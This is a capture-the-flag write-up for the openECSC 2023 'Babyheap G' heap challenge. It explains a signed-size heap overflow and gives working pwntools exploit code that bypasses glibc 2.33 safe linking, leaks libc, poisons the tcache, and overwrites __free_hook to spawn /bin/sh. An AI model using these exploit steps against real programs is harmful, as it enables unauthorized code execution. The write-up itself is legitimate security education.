openECSC 23 - Babyheap G

on 31 May 2023

pwn

Introduction

Heap exploitation is an interesting niche of binary exploitation, one where you need to really get creative in order to achieve a shell. Not every version of GLIBC has got the same mitigations and a single attack may work on version of GLIBC and fail in another.

In this post I’d like to highlight some modern techniques that work on a moderately recent version of GLIBC (2.33).

This challenge is a pretty standard heap note binary. We can allocate (malloc) a new arbitrary-sized note, edit, show or delete (free) a previously allocated one.

Let’s open the binary in Ghidra and look for the bug.

Reversing

A screenshot of the main function in the binary

In the main function we can see the four choices that we saw earlier. Let’s dig into the allocate method.

A screenshot of the allocate function in the binary

After a little bit of reversing, we can understand that the maximum size of an allocated chunk can be of 256 (0x100) bytes. We can also see that every chunk allocated is stored in an array of three-fielded structs.

// This is the bucket structure
struct Bucket {
  long size;  
  int in_use;
  void *ptr;
};

There can be a maximum of 10 currently allocated (i.e. not freed) chunks. Making the malloc fail with a negative size wouldn’t bring us any benefit, since the returned ptr is checked against the NULL ptr.

Let’s check the unallocate function.

A screenshot of the unallocate function in the binary

There is a check for the in_use field, so we cannot perform a double free. The pointer in the buckets global array is correctly zeroed and the in_use flag is cleared. Another thing to remember is the bucket->size-sized memset before the actual call to free.

Let’s reverse the dump function now.

A screenshot of the dump function in the binary

The dump function writes on stdout a maximum of bucket->size bytes from the bucket->ptr. This doesn’t allow us to read stuff outside our chunk.

Now, the last function to reverse, the edit function.

A screenshot of the edit function in the binary

We understand that the first if checks if the index of the bucket to edit is within bounds and if the bucket is in use (to avoid a use after free vulnerability).

The program then proceeds ans ask us a size, to partially edit our note. If this size is greater that the bucket’s allocated size it refuses to comply and prints an error.

But there’s a catch. The size that we entered is a signed integer, and it is checked against another signed integer, so if we entered a negative size, the check would pass. Then, our size is converted to unsigned long and passed as third parameter in a call to read.

This is a signed to unsigned conversion error and results in a heap overflow!

If we allocate a 0x10 chunk, then proceed to edit for a size of -1 bytes, the resulting call to read is something like this, a clearly super big overflow:

read(0, buckets[n].ptr, 0xffffffffffffffff)

Exploitation

In heap exploitation is often useful to build an arbitrary write primitive. This is useful in order to overwrite function pointers, GOT entries or placing a ROP chain. This can be achieved in many ways, one of the easiest ones is by abusing the tcache in an attack called tcache poisining.

The tcache is a singly-linked list of free chunks that is kept per-thread. It contains chunks of sizes from 0x20 to 0x400 bytes. Each bin can contain a maximum number of free chunks. This limit is configurable, but it’s set to 7 by default. The tcachebins are the first bins searched when malloc tries to allocate a chunk.

This is what a free’d tcachebinned chunk looks like.

An image representing metadata on a tcachebin chunk

The fd points to the next free chunk in the tcachebin. The key field is used as an anti double-free measure. It is a random value, when freeing a chunk its second quadword is checked against the key. If the key matches the found value, free aborts the program, because it detected a double free.

When we malloc a chunk from a tcachebin, no checks are performed on the integrity of the fd pointer.

The tcache poisoning attack consists in overwriting the fd pointer of a tcachebin chunk with an arbitrary address, so that the next time malloc is called, the chunk returned will overlap with the arbitrary address.

An image representing metadata on two tcachebin chunks

Notice how pointers in tcachebins point directly to the user data, instead of 0x10 bytes before, as the fastbins and the other bins do.

An image representing metadata on two tcachebin chunks after being overwritten

This is what happens when an attacker overwrites the fd pointer. The next tcachebin pointer points to 0xdead instead of 0x55040.

There’s a catch, and we can see it in the image. Each fd is XORed with 0x55. This is a security hardening called safe linking.

What’s safe linking?

Safe linking is a mitigation introduced in version 2.32 of GLIBC. It encrypts the fd pointer of single-linked lists like fastbins and tcachebins.

The key used is the address of the single-list ptr shifted by PAGE_SHIFT (12 bits on x86_64). The actual pointer is then XORed with this key. This has the advantage of using the randomness present in the high bits of the address (per ASLR) as the key.

// This is the operation performed
// when the pointer is both encrypted and unencrypted.
fd ^= ((long long)&fd >> 12);

In order to undo the XOR (i.e. decrypt the pointer), the operation is the same one as for encryption (using the properties of the XOR logical operation).

For further information here’s the blog post from the people who invented this trick. You can see how’s implemented here, in the source code of GLIBC.

Bypass safe linking

There are a couple of attacks we can perform on safe linking. Both require a heap fd pointer leak to work.

The first attack relies on the fact that the first 12 bits of the shadowed pointer are not encrypted. Then, if the pointer and its address reside on the same page we can decrypt the next part of the pointer recursively. This attack is demonstrated in the shellphish GitHub repo “how2heap”.

The second attack, which is a simpler variation of the former, uncovers the key by leaking the fd of the last entry of a single-linked list, using the fact that the next pointer points to NULL (0x0). A number, XORed with 0, stays the same.

So, something like this should be enough to leak the heap base and safe linking key.

# Leak heap base and safe linking key.
# malloc, free and malloc again to leak fd,
# which xors the NULL ptr with the safe linking key,
# which is basically (&ptr >> 12) ^ ptr.
malloc(0x18)
free(0)
malloc(0x18)
heap_leak = show(0)

fd_key = u64(heap_leak.ljust(8, b"\x00"))
heap_base = fd_key << 12

# [*] Heap base @ 0x55f686af0000, fd key 0x55f686af0
info(f"Heap base @ {hex(heap_base)}, fd key {hex(fd_key)}")

Leak GLIBC base address

The end goal of many exploitation challenges is to land a shell. This challenge is no different. We have many ways to spawn /bin/sh, but using system is usually the easiest. But, in order to call system we must know its address and defeat ASLR. How can we do it?

We can leverage the unsortedbin, one of the doubly-linked lists present in GLIBC’s malloc. If the chunk is the first entry inside the unsortedbin freelist, the fd and bk pointers both point inside the main_arena struct in GLIBC.

Since we can only make requests that are less than 256 bytes in size, we cannot directly make a unsortedbin-sized request.

We also have to deal with the tcachebin: before a chunk ends up in unsortedbin we have to fill the respective tcachebin. So we pick a size outside of fastbin-able size, e.g. 0x90, malloc 9 chunks (one to avoid top chunk consolidation) and then free the first eight, so that the first 7 freed chunks end up in the 0x90 tcachebin and the remaining one ends up in unsortedbin.

# Fill the 0x90 tcache, so the 8th will be
# free'd into unsortedbin.

# Allocate 9 chunks, so one will serve as 
# top chunk consolidation barrier.
for _ in range(9):
    malloc(0x88)

for i in range(7):
    free(i)

# This will be put into unsortedbin, since the
# 0x90 tcachebin is full.
free(7)

At this point, chunk 7 is inside unsortedbin. But if we made 8 malloc(0x88) requests, the 8th one wouldn’t contain our main_arena ptr. Why is that?

Because when GLIBC is compiled with tcache support, if a chunk of exact fit is found during the unsortedbin search it is placed in a tcachebin first, thus overwriting the fd and bk pointers.

The solution is to leverage the operation called remaindering, we make a smaller request (i.e. non-exact fit), so malloc unlinks a larger free chunk and splits it in two, resulting in one chunk of the exact size of the requested one and the other one with the remaining space. malloc then frees the smaller remaindered chunk.

Notice how this doesn’t use the tcache. If you pay close attention the pointer we leak is not the main_arena unsortedbin ptr, instead it points to the 0x90 smallbin. This is because malloc sorts chunks found in unsortedbin into smallbins and largebins during the unsortedbin search.

smallbins and largebins are two doubly-linked lists which also have their default fd and bk pointing inside main_arena.

# This will be remaindered from the unsortedbin.
malloc(0x68)

# Free the previous consolidation barrier, since
# it isn't needed anymore.
free(8)

# This got sorted in the 0x90 smallbin before remaindering.
libc.address = u64(show(0).ljust(8, b"\x00")) - 0x1e0c80

Obtaining a shell

Once we gained an arbitrary write primitive, we now need a way to execute arbitrary code. Since we’re using GLIBC version 2.33, we can still leverage the good old __malloc_hook and __free_hook.

If you don’t know them, __free_hook and __malloc_hook are two function pointers that are executed instead of free and malloc. By default they point to NULL, so they are normally never called. They were long deprecated and they were finally removed in GLIBC 2.34.

The idea is simple: overwrite __free_hook with the address of system, malloc a chunk, edit it to contain /bin/sh\x00 and then free it.

When freeing it, our __free_hook would kick in and call system("/bin/sh\x00") instead of free.

But there’s a catch. Remember that nasty memset before freeing the chunk? It erases our /bin/sh\x00 with bucket->size NULL bytes.

We can bypass that memset by allocating a 0 sized chunk and use the edit overflow to write /bin/sh\x00 anyway.

# Now, use the overflow to overwrite a tcachebin
# fd to perform a tcachebin poisoning attack and
# target the __free_hook symbol.
malloc(0x28)
malloc(0x28)
malloc(0x28)

free(2)
free(1)

# Forge fd to point to the __free_hook.
edit(0, -1, b"A"*0x28 + p64(0x31) + \
    p64(libc.sym.__free_hook ^ fd_key))

# Useless alloc on bucket 1.
malloc(0x28)

# This points to __free_hook on bucket 2.
malloc(0x28)

edit(2, -1, p64(libc.sym.system))

# 0 sized allocation to trick the memset
# before free. This alloc lands in bucket 3.
malloc(0)

edit(3, -1, b"/bin/sh\x00")

# Shell
free(3)

Conclusion

We discovered a couple of heap exploitation techniques and managed to bypass one of the latest mitigation, safe linking. If you’re curious, the complete exploit is available here.

If you have any question or you want to point out an inaccuracy or plain error please reach me on one of the contacts I have in my page.